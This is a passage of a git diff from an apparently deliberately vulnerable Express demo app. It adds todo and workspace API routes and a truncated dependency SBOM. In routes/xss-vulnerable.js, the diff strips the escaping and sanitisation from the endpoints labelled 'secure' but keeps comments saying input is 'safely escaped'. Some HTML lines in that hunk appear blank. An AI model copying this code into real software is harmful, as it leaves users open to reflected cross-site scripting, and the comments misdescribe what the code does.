String(t).trim(); }).filter(Boolean); + } + todo.updated_at = new Date(); + todo.save(function (err2, updated) { + if (err2) return next(err2); + auditService.createEvent({ + workspace: workspaceId, + actor: req.apiUserId, + action: 'todo.updated', + resourceType: 'todo', + resourceId: String(updated._id), + details: {}, + ip: req.ip, + }); + webhookDelivery.notifyWebhooks(workspaceId, 'todo.updated', { + resourceId: String(updated._id), + data: todoToJson(updated), + }); + ruleEngine.runRulesForTodo(workspaceId, 'todo.updated', updated, function () {}); + res.json(todoToJson(updated)); + }); + }); + } +); + +router.delete( + '/:workspaceId/todos/:id', + [param('id').isMongoId()], + function (req, res, next) { + var v = handleValidation(req, res); + if (v) return v; + if (req.workspaceMembership.role === 'viewer') { + return res.status(403).json({ error: 'Viewers cannot delete todos' }); + } + var workspaceId = req.workspaceId; + var id = req.params.id; + var idObj = new mongoose.Types.ObjectId(id); + var workspaceObjId = new mongoose.Types.ObjectId(workspaceId); + Todo.findOne({ _id: idObj, workspace: workspaceObjId, deleted_at: null }).exec(function (err, todo) { + if (err) return next(err); + if (!todo) return res.status(404).json({ error: 'Todo not found' }); + todo.deleted_at = new Date(); + todo.save(function (err2, updated) { + if (err2) return next(err2); + auditService.createEvent({ + workspace: workspaceId, + actor: req.apiUserId, + action: 'todo.deleted', + resourceType: 'todo', + resourceId: String(updated._id), + details: {}, + ip: req.ip, + }); + webhookDelivery.notifyWebhooks(workspaceId, 'todo.deleted', { + resourceId: String(updated._id), + data: todoToJson(updated), + }); + res.status(204).send(); + }); + }); + } +); + +module.exports = router; diff --git a/routes/workspaces.js b/routes/workspaces.js new file mode 100644 index 00000000000..eec21b0d1eb --- /dev/null +++ b/routes/workspaces.js @@ -0,0 +1,259 @@ +/** + * REST API: Workspaces and members. + * POST /api/workspaces, GET /api/workspaces, GET/PATCH /api/workspaces/:id + * POST /api/workspaces/:id/members, DELETE /api/workspaces/:id/members/:userId + */ + +var mongoose = require('mongoose'); +var express = require('express'); +var router = express.Router(); +var { body, param, validationResult } = require('express-validator'); +var Workspace = mongoose.model('Workspace'); +var WorkspaceMember = mongoose.model('WorkspaceMember'); +var apiAuth = require('../middleware/api-auth'); +var workspaceAuth = require('../services/workspace-auth'); +var auditService = require('../services/audit'); +var webhookDelivery = require('../services/webhook-delivery'); + +function slugify(str) { + return str + .toString() + .toLowerCase() + .trim() + .replace(/\s+/g, '-') + .replace(/[^a-z0-9-]/g, '') + .replace(/-+/g, '-') + .replace(/^-|-$/g, ''); +} + +function handleValidation(req, res) { + var errors = validationResult(req); + if (!errors.isEmpty()) { + return res.status(400).json({ error: 'Validation failed', details: errors.array() }); + } + return null; +} + +router.use(apiAuth.setApiUser); +router.use(apiAuth.requireApiUser); + +router.post( + '/', + [ + body('name').trim().notEmpty().withMessage('name is required').isLength({ max: 200 }), + body('slug').optional().trim().matches(/^[a-z0-9-]+$/).withMessage('slug must be URL-safe (a-z, 0-9, -)'), + ], + function (req, res, next) { + var v = handleValidation(req, res); + if (v) return v; + var name = req.body.name.trim(); + var slug = req.body.slug ? req.body.slug.trim() : slugify(name); + if (!slug) { + return res.status(400).json({ error: 'slug could not be derived from name; provide slug explicitly' }); + } + var userId = req.apiUserId; + var workspace = new Workspace({ name: name, slug: slug }); + workspace.save(function (err, ws) { + if (err) { + if (err.code === 11000) return res.status(409).json({ error: 'Workspace slug already exists' }); + return next(err); + } + var member = new WorkspaceMember({ workspace: ws._id, user: userId, role: 'owner' }); + member.save(function (err2) { + if (err2) return next(err2); + auditService.createEvent({ + workspace: ws._id, + actor: userId, + action: 'workspace.created', + resourceType: 'workspace', + resourceId: String(ws._id), + details: { name: name, slug: slug }, + ip: req.ip, + }); + res.status(201).json({ + id: ws._id, + name: ws.name, + slug: ws.slug, + createdAt: ws.createdAt, + settings: ws.settings, + }); + }); + }); + } +); + +router.get('/', function (req, res, next) { + var userId = req.apiUserId; + WorkspaceMember.find({ user: userId }) + .populate('workspace') + .lean() + .exec(function (err, memberships) { + if (err) return next(err); + var workspaces = (memberships || []) + .filter(function (m) { return m.workspace; }) + .map(function (m) { + var ws = m.workspace; + return { + id: ws._id, + name: ws.name, + slug: ws.slug, + createdAt: ws.createdAt, + settings: ws.settings, + role: m.role, + }; + }); + res.json({ workspaces: workspaces }); + }); +}); + +router.get( + '/:id', + [param('id').isMongoId().withMessage('Invalid workspace ID')], + function (req, res, next) { + var v = handleValidation(req, res); + if (v) return v; + var id = req.params.id; + var userId = req.apiUserId; + workspaceAuth.getMembership(id, userId).then(function (membership) { + if (!membership) { + res.status(403).json({ error: 'Not a member of this workspace' }); + return null; + } + return Workspace.findById(id).lean().exec(); + }).then(function (ws) { + if (!ws) { + if (!res.headersSent) res.status(404).json({ error: 'Workspace not found' }); + return null; + } + res.json({ + id: ws._id, + name: ws.name, + slug: ws.slug, + createdAt: ws.createdAt, + settings: ws.settings, + }); + }).catch(next); + } +); + +router.patch( + '/:id', + [param('id').isMongoId()], + body('name').optional().trim().isLength({ max: 200 }), + body('settings').optional().isObject(), + function (req, res, next) { + var v = handleValidation(req, res); + if (v) return v; + var id = req.params.id; + var userId = req.apiUserId; + workspaceAuth.getMembership(id, userId).then(function (membership) { + if (!membership) { + res.status(403).json({ error: 'Not a member of this workspace' }); + return null; + } + if (!workspaceAuth.ROLES_WITH_ADMIN.includes(membership.role)) { + res.status(403).json({ error: 'Only owner or admin can update workspace' }); + return null; + } + return Workspace.findById(id).exec(); + }).then(function (ws) { + if (!ws) { + res.status(404).json({ error: 'Workspace not found' }); + return null; + } + if (req.body.name !== undefined) ws.name = req.body.name.trim(); + if (req.body.settings !== undefined) ws.settings = req.body.settings; + return ws.save(); + }).then(function (ws) { + if (!ws) return null; + auditService.createEvent({ + workspace: ws._id, + actor: userId, + action: 'workspace.updated', + resourceType: 'workspace', + resourceId: String(ws._id), + details: { name: ws.name, settings: ws.settings }, + ip: req.ip, + }); + webhookDelivery.notifyWebhooks(ws._id, 'workspace.updated', { resourceId: String(ws._id), data: { name: ws.name } }); + res.json({ id: ws._id, name: ws.name, slug: ws.slug, createdAt: ws.createdAt, settings: ws.settings }); + return null; + }).catch(next); + } +); + +router.post( + '/:id/members', + [ + param('id').isMongoId(), + body('user').notEmpty().withMessage('user (email or id) is required').trim(), + body('role').isIn(['admin', 'member', 'viewer']).withMessage('role must be admin, member, or viewer'), + ], + function (req, res, next) { + var v = handleValidation(req, res); + if (v) return v; + var workspaceId = req.params.id; + var userId = req.apiUserId; + var newUser = req.body.user.trim(); + var role = req.body.role; + workspaceAuth.getMembership(workspaceId, userId).then(function (membership) { + if (!membership) return res.status(403).json({ error: 'Not a member of this workspace' }); + if (!workspaceAuth.ROLES_WITH_ADMIN.includes(membership.role)) { + return res.status(403).json({ error: 'Only owner or admin can add members' }); + } + return WorkspaceMember.findOne({ workspace: workspaceId, user: newUser }).exec(); + }).then(function (existing) { + if (existing) return res.status(409).json({ error: 'User is already a member' }); + var member = new WorkspaceMember({ workspace: workspaceId, user: newUser, role: role }); + return member.save(); + }).then(function (member) { + auditService.createEvent({ + workspace: workspaceId, + actor: userId, + action: 'member.added', + resourceType: 'member', + resourceId: String(member._id), + details: { user: newUser, role: role }, + ip: req.ip, + }); + webhookDelivery.notifyWebhooks(workspaceId, 'member.added', { resourceId: String(member._id), data: { user: newUser, role } }); + res.status(201).json({ id: member._id, workspace: workspaceId, user: newUser, role: role }); + }).catch(next); + } +); + +router.delete( + '/:id/members/:userId', + [param('id').isMongoId(), param('userId').notEmpty().trim()], + function (req, res, next) { + var v = handleValidation(req, res); + if (v) return v; + var workspaceId = req.params.id; + var targetUserId = req.params.userId; + var actorId = req.apiUserId; + workspaceAuth.getMembership(workspaceId, actorId).then(function (membership) { + if (!membership) return res.status(403).json({ error: 'Not a member of this workspace' }); + if (!workspaceAuth.ROLES_WITH_ADMIN.includes(membership.role)) { + return res.status(403).json({ error: 'Only owner or admin can remove members' }); + } + if (targetUserId === actorId && membership.role === 'owner') { + return res.status(400).json({ error: 'Owner cannot remove themselves; transfer ownership first' }); + } + return WorkspaceMember.findOneAndDelete({ workspace: workspaceId, user: targetUserId }).exec(); + }).then(function (removed) { + if (!removed) return res.status(404).json({ error: 'Member not found' }); + auditService.createEvent({ + workspace: workspaceId, + actor: actorId, + action: 'member.removed', + resourceType: 'member', + resourceId: targetUserId, + details: { removedUser: targetUserId }, + ip: req.ip, + }); + res.status(204).send(); + }).catch(next); + } +); + +module.exports = router; diff --git a/routes/xss-vulnerable.js b/routes/xss-vulnerable.js index af105c7bfaf..16248b6e67f 100644 --- a/routes/xss-vulnerable.js +++ b/routes/xss-vulnerable.js @@ -39,8 +39,8 @@ function processUserInput(userInput, res) {
${userInput}

Try the secure endpoint

- - `; + + `; } @@ -49,9 +49,6 @@ router.get('/secure', (req, res) => { // Get user input from query parameter const userInput = req.query.input || 'No input provided'; - // SECURE: Properly escape user input before including in HTML - const safeInput = escape(userInput); - // SECURE: Use Content Security Policy header to mitigate XSS impact res.setHeader('Content-Security-Policy', "default-src 'self'; script-src 'self'"); @@ -61,7 +58,7 @@ router.get('/secure', (req, res) => { // SECURE: Set X-Content-Type-Options to prevent MIME type sniffing res.setHeader('X-Content-Type-Options', 'nosniff'); - res.send(` + res.contentType('text/plain').send(` @@ -82,10 +79,10 @@ router.get('/secure', (req, res) => {

Secure XSS Demo

Your input (safely escaped):

-
${safeInput}
+
${userInput}

Try entering script tags or other HTML - they'll be escaped!

- +

Back to vulnerable example

@@ -96,16 +93,14 @@ router.get('/secure', (req, res) => { // SECURE: JSON endpoint for automated testing with sanitized echo router.get('/secure/json', (req, res) => { - const rawInput = req.query.input; - const userInput = typeof rawInput === 'string' ? rawInput : 'No input provided'; - const safeInput = sanitizeInput(userInput); + const userInput = req.query.input; res.setHeader('Content-Security-Policy', "default-src 'none'"); res.setHeader('X-Content-Type-Options', 'nosniff'); res.json({ message: 'Secure JSON echo', - echo: safeInput, + echo: userInput, rawLength: userInput.length }); }); diff --git a/sbom-cyclonedx.json b/sbom-cyclonedx.json new file mode 100644 index 00000000000..ad3c177e1e4 --- /dev/null +++ b/sbom-cyclonedx.json @@ -0,0 +1,2 @@ +{"$schema":"http://cyclonedx.org/schema/bom-1.6.schema.json","bomFormat":"CycloneDX","specVersion":"1.6","serialNumber":"urn:uuid:0eb7e277-c838-49e3-ae88-54e5a1bb763b","version":1,"metadata":{"timestamp":"2026-02-20T18:57:23Z","tools":{"components":[{"type":"application","author":"Snyk","name":"snyk-cli","version":"1.1300.2"}],"services":[{"provider":{"name":"Snyk"},"name":"SBOM Export API","version":"v1.124.4"}]},"component":{"bom-ref":"1-goof@1.0.1","type":"application","name":"goof","version":"1.0.1","purl":"pkg:npm/goof@1.0.1"}},"components":[{"bom-ref":"2-adm-zip@0.4.7","type":"library","name":"adm-zip","version":"0.4.7","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/adm-zip@0.4.7"},{"bom-ref":"3-body-parser@1.9.0","type":"library","name":"body-parser","version":"1.9.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/body-parser@1.9.0"},{"bom-ref":"4-bytes@1.0.0","type":"library","name":"bytes","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/bytes@1.0.0"},{"bom-ref":"5-depd@1.0.1","type":"library","name":"depd","version":"1.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/depd@1.0.1"},{"bom-ref":"6-iconv-lite@0.4.4","type":"library","name":"iconv-lite","version":"0.4.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/iconv-lite@0.4.4"},{"bom-ref":"7-media-typer@0.3.0","type":"library","name":"media-typer","version":"0.3.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/media-typer@0.3.0"},{"bom-ref":"8-on-finished@2.1.0","type":"library","name":"on-finished","version":"2.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/on-finished@2.1.0"},{"bom-ref":"9-ee-first@1.0.5","type":"library","name":"ee-first","version":"1.0.5","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/ee-first@1.0.5"},{"bom-ref":"10-qs@2.2.4","type":"library","name":"qs","version":"2.2.4","licenses":[{"expression":"BSD-2-Clause"}],"purl":"pkg:npm/qs@2.2.4"},{"bom-ref":"11-raw-body@1.3.0","type":"library","name":"raw-body","version":"1.3.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/raw-body@1.3.0"},{"bom-ref":"12-type-is@1.5.7","type":"library","name":"type-is","version":"1.5.7","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/type-is@1.5.7"},{"bom-ref":"13-mime-types@2.0.14","type":"library","name":"mime-types","version":"2.0.14","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/mime-types@2.0.14"},{"bom-ref":"14-mime-db@1.12.0","type":"library","name":"mime-db","version":"1.12.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/mime-db@1.12.0"},{"bom-ref":"15-cfenv@1.2.2","type":"library","name":"cfenv","version":"1.2.2","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/cfenv@1.2.2"},{"bom-ref":"16-js-yaml@3.13.1","type":"library","name":"js-yaml","version":"3.13.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/js-yaml@3.13.1"},{"bom-ref":"17-argparse@1.0.10","type":"library","name":"argparse","version":"1.0.10","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/argparse@1.0.10"},{"bom-ref":"18-sprintf-js@1.0.3","type":"library","name":"sprintf-js","version":"1.0.3","licenses":[{"expression":"BSD-3-Clause"}],"purl":"pkg:npm/sprintf-js@1.0.3"},{"bom-ref":"19-esprima@4.0.1","type":"library","name":"esprima","version":"4.0.1","licenses":[{"expression":"BSD-2-Clause"}],"purl":"pkg:npm/esprima@4.0.1"},{"bom-ref":"20-ports@1.1.0","type":"library","name":"ports","version":"1.1.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/ports@1.1.0"},{"bom-ref":"21-underscore@1.9.1","type":"library","name":"underscore","version":"1.9.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/underscore@1.9.1"},{"bom-ref":"22-consolidate@0.14.5","type":"library","name":"consolidate","version":"0.14.5","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/consolidate@0.14.5"},{"bom-ref":"23-bluebird@3.5.4","type":"library","name":"bluebird","version":"3.5.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/bluebird@3.5.4"},{"bom-ref":"24-csv-parse@6.1.0","type":"library","name":"csv-parse","version":"6.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/csv-parse@6.1.0"},{"bom-ref":"25-dompurify@3.3.0","type":"library","name":"dompurify","version":"3.3.0","licenses":[{"expression":"(MPL-2.0 OR Apache-2.0)"}],"purl":"pkg:npm/dompurify@3.3.0"},{"bom-ref":"26-@types/trusted-types@2.0.7","type":"library","group":"@types","name":"@types/trusted-types","version":"2.0.7","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/%40types/trusted-types@2.0.7"},{"bom-ref":"27-dustjs-helpers@1.5.0","type":"library","name":"dustjs-helpers","version":"1.5.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/dustjs-helpers@1.5.0"},{"bom-ref":"28-dustjs-linkedin@2.5.0","type":"library","name":"dustjs-linkedin","version":"2.5.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/dustjs-linkedin@2.5.0"},{"bom-ref":"29-ejs@1.0.0","type":"library","name":"ejs","version":"1.0.0","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/ejs@1.0.0"},{"bom-ref":"30-ejs-locals@1.0.2","type":"library","name":"ejs-locals","version":"1.0.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/ejs-locals@1.0.2"},{"bom-ref":"31-ejs@0.8.8","type":"library","name":"ejs","version":"0.8.8","licenses":[{"expression":"Apache-2.0"}],"purl":"pkg:npm/ejs@0.8.8"},{"bom-ref":"32-errorhandler@1.2.0","type":"library","name":"errorhandler","version":"1.2.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/errorhandler@1.2.0"},{"bom-ref":"33-accepts@1.1.4","type":"library","name":"accepts","version":"1.1.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/accepts@1.1.4"},{"bom-ref":"34-negotiator@0.4.9","type":"library","name":"negotiator","version":"0.4.9","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/negotiator@0.4.9"},{"bom-ref":"35-escape-html@1.0.1","type":"library","name":"escape-html","version":"1.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/escape-html@1.0.1"},{"bom-ref":"36-express@4.12.4","type":"library","name":"express","version":"4.12.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/express@4.12.4"},{"bom-ref":"37-accepts@1.2.13","type":"library","name":"accepts","version":"1.2.13","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/accepts@1.2.13"},{"bom-ref":"38-mime-types@2.1.23","type":"library","name":"mime-types","version":"2.1.23","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/mime-types@2.1.23"},{"bom-ref":"39-mime-db@1.39.0","type":"library","name":"mime-db","version":"1.39.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/mime-db@1.39.0"},{"bom-ref":"40-negotiator@0.5.3","type":"library","name":"negotiator","version":"0.5.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/negotiator@0.5.3"},{"bom-ref":"41-content-disposition@0.5.0","type":"library","name":"content-disposition","version":"0.5.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/content-disposition@0.5.0"},{"bom-ref":"42-content-type@1.0.4","type":"library","name":"content-type","version":"1.0.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/content-type@1.0.4"},{"bom-ref":"43-cookie@0.1.2","type":"library","name":"cookie","version":"0.1.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/cookie@0.1.2"},{"bom-ref":"44-cookie-signature@1.0.6","type":"library","name":"cookie-signature","version":"1.0.6","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/cookie-signature@1.0.6"},{"bom-ref":"45-debug@2.2.0","type":"library","name":"debug","version":"2.2.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/debug@2.2.0"},{"bom-ref":"46-ms@0.7.1","type":"library","name":"ms","version":"0.7.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/ms@0.7.1"},{"bom-ref":"47-etag@1.6.0","type":"library","name":"etag","version":"1.6.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/etag@1.6.0"},{"bom-ref":"48-crc@3.2.1","type":"library","name":"crc","version":"3.2.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/crc@3.2.1"},{"bom-ref":"49-finalhandler@0.3.6","type":"library","name":"finalhandler","version":"0.3.6","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/finalhandler@0.3.6"},{"bom-ref":"50-on-finished@2.2.1","type":"library","name":"on-finished","version":"2.2.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/on-finished@2.2.1"},{"bom-ref":"51-ee-first@1.1.0","type":"library","name":"ee-first","version":"1.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/ee-first@1.1.0"},{"bom-ref":"52-fresh@0.2.4","type":"library","name":"fresh","version":"0.2.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/fresh@0.2.4"},{"bom-ref":"53-merge-descriptors@1.0.0","type":"library","name":"merge-descriptors","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/merge-descriptors@1.0.0"},{"bom-ref":"54-methods@1.1.2","type":"library","name":"methods","version":"1.1.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/methods@1.1.2"},{"bom-ref":"55-parseurl@1.3.3","type":"library","name":"parseurl","version":"1.3.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/parseurl@1.3.3"},{"bom-ref":"56-path-to-regexp@0.1.3","type":"library","name":"path-to-regexp","version":"0.1.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/path-to-regexp@0.1.3"},{"bom-ref":"57-proxy-addr@1.0.10","type":"library","name":"proxy-addr","version":"1.0.10","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/proxy-addr@1.0.10"},{"bom-ref":"58-forwarded@0.1.2","type":"library","name":"forwarded","version":"0.1.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/forwarded@0.1.2"},{"bom-ref":"59-ipaddr.js@1.0.5","type":"library","name":"ipaddr.js","version":"1.0.5","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/ipaddr.js@1.0.5"},{"bom-ref":"60-qs@2.4.2","type":"library","name":"qs","version":"2.4.2","licenses":[{"expression":"BSD-2-Clause"}],"purl":"pkg:npm/qs@2.4.2"},{"bom-ref":"61-range-parser@1.0.3","type":"library","name":"range-parser","version":"1.0.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/range-parser@1.0.3"},{"bom-ref":"62-send@0.12.3","type":"library","name":"send","version":"0.12.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/send@0.12.3"},{"bom-ref":"63-destroy@1.0.3","type":"library","name":"destroy","version":"1.0.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/destroy@1.0.3"},{"bom-ref":"64-mime@1.3.4","type":"library","name":"mime","version":"1.3.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/mime@1.3.4"},{"bom-ref":"65-serve-static@1.9.3","type":"library","name":"serve-static","version":"1.9.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/serve-static@1.9.3"},{"bom-ref":"66-utils-merge@1.0.0","type":"library","name":"utils-merge","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/utils-merge@1.0.0"},{"bom-ref":"67-type-is@1.6.16","type":"library","name":"type-is","version":"1.6.16","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/type-is@1.6.16"},{"bom-ref":"68-vary@1.0.1","type":"library","name":"vary","version":"1.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/vary@1.0.1"},{"bom-ref":"69-express-fileupload@0.0.5","type":"library","name":"express-fileupload","version":"0.0.5","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/express-fileupload@0.0.5"},{"bom-ref":"70-connect-busboy@0.0.2","type":"library","name":"connect-busboy","version":"0.0.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/connect-busboy@0.0.2"},{"bom-ref":"71-busboy@1.6.0","type":"library","name":"busboy","version":"1.6.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/busboy@1.6.0"},{"bom-ref":"72-streamsearch@1.1.0","type":"library","name":"streamsearch","version":"1.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/streamsearch@1.1.0"},{"bom-ref":"73-fs-extra@0.22.1","type":"library","name":"fs-extra","version":"0.22.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/fs-extra@0.22.1"},{"bom-ref":"74-graceful-fs@4.1.15","type":"library","name":"graceful-fs","version":"4.1.15","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/graceful-fs@4.1.15"},{"bom-ref":"75-jsonfile@2.4.0","type":"library","name":"jsonfile","version":"2.4.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/jsonfile@2.4.0"},{"bom-ref":"76-rimraf@2.6.3","type":"library","name":"rimraf","version":"2.6.3","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/rimraf@2.6.3"},{"bom-ref":"77-glob@7.1.3","type":"library","name":"glob","version":"7.1.3","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/glob@7.1.3"},{"bom-ref":"78-fs.realpath@1.0.0","type":"library","name":"fs.realpath","version":"1.0.0","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/fs.realpath@1.0.0"},{"bom-ref":"79-inflight@1.0.6","type":"library","name":"inflight","version":"1.0.6","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/inflight@1.0.6"},{"bom-ref":"80-once@1.4.0","type":"library","name":"once","version":"1.4.0","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/once@1.4.0"},{"bom-ref":"81-wrappy@1.0.2","type":"library","name":"wrappy","version":"1.0.2","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/wrappy@1.0.2"},{"bom-ref":"82-inherits@2.0.3","type":"library","name":"inherits","version":"2.0.3","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/inherits@2.0.3"},{"bom-ref":"83-minimatch@3.0.4","type":"library","name":"minimatch","version":"3.0.4","licenses":[{"expression":"ISC"}],"purl":"pkg:npm/minimatch@3.0.4"},{"bom-ref":"84-brace-expansion@1.1.11","type":"library","name":"brace-expansion","version":"1.1.11","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/brace-expansion@1.1.11"},{"bom-ref":"85-balanced-match@1.0.0","type":"library","name":"balanced-match","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/balanced-match@1.0.0"},{"bom-ref":"86-concat-map@0.0.1","type":"library","name":"concat-map","version":"0.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/concat-map@0.0.1"},{"bom-ref":"87-path-is-absolute@1.0.1","type":"library","name":"path-is-absolute","version":"1.0.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/path-is-absolute@1.0.1"},{"bom-ref":"88-streamifier@0.1.1","type":"library","name":"streamifier","version":"0.1.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/streamifier@0.1.1"},{"bom-ref":"89-express-session@1.17.2","type":"library","name":"express-session","version":"1.17.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/express-session@1.17.2"},{"bom-ref":"90-cookie@0.4.1","type":"library","name":"cookie","version":"0.4.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/cookie@0.4.1"},{"bom-ref":"91-debug@2.6.9","type":"library","name":"debug","version":"2.6.9","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/debug@2.6.9"},{"bom-ref":"92-ms@2.0.0","type":"library","name":"ms","version":"2.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/ms@2.0.0"},{"bom-ref":"93-depd@2.0.0","type":"library","name":"depd","version":"2.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/depd@2.0.0"},{"bom-ref":"94-on-headers@1.0.2","type":"library","name":"on-headers","version":"1.0.2","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/on-headers@1.0.2"},{"bom-ref":"95-safe-buffer@5.2.1","type":"library","name":"safe-buffer","version":"5.2.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/safe-buffer@5.2.1"},{"bom-ref":"96-uid-safe@2.1.5","type":"library","name":"uid-safe","version":"2.1.5","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/uid-safe@2.1.5"},{"bom-ref":"97-random-bytes@1.0.0","type":"library","name":"random-bytes","version":"1.0.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/random-bytes@1.0.0"},{"bom-ref":"98-express-validator@7.3.1","type":"library","name":"express-validator","version":"7.3.1","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/express-validator@7.3.1"},{"bom-ref":"99-lodash@4.17.21","type":"library","name":"lodash","version":"4.17.21","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/lodash@4.17.21"},{"bom-ref":"100-validator@13.15.23","type":"library","name":"validator","version":"13.15.23","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/validator@13.15.23"},{"bom-ref":"101-file-type@8.1.0","type":"library","name":"file-type","version":"8.1.0","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/file-type@8.1.0"},{"bom-ref":"102-hbs@4.0.4","type":"library","name":"hbs","version":"4.0.4","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/hbs@4.0.4"},{"bom-ref":"103-handlebars@4.0.14","type":"library","name":"handlebars","version":"4.0.14","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/handlebars@4.0.14"},{"bom-ref":"104-async@2.6.3","type":"library","name":"async","version":"2.6.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/async@2.6.3"},{"bom-ref":"105-optimist@0.6.1","type":"library","name":"optimist","version":"0.6.1","licenses":[{"expression":"(MIT OR X11)"}],"purl":"pkg:npm/optimist@0.6.1"},{"bom-ref":"106-minimist@0.0.10","type":"library","name":"minimist","version":"0.0.10","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/minimist@0.0.10"},{"bom-ref":"107-wordwrap@0.0.3","type":"library","name":"wordwrap","version":"0.0.3","licenses":[{"expression":"MIT"}],"purl":"pkg:npm/wordwrap@0.0.3"},{"bom-ref":"108-source-map@0.6.1","type":"library","name":"source-map","version":"0.6.1","licenses":[{"expression":"BSD-3-Clause"}],"purl":"pkg:npm/source-map@0.6.1"},{"bom-ref":"109-uglify-js@3.13.9","type":"library","name":"uglify-js","version":"3.13.9","licenses":[{"expression":"BSD-2-Clause"}],"purl":"pkg:npm/uglify-js@3.13.9"},{"bom-ref":"110-walk@2.3.9","type":"library","name":"walk","version":"2.3.9","licenses":[{"expression":"(Apache-2.0 OR 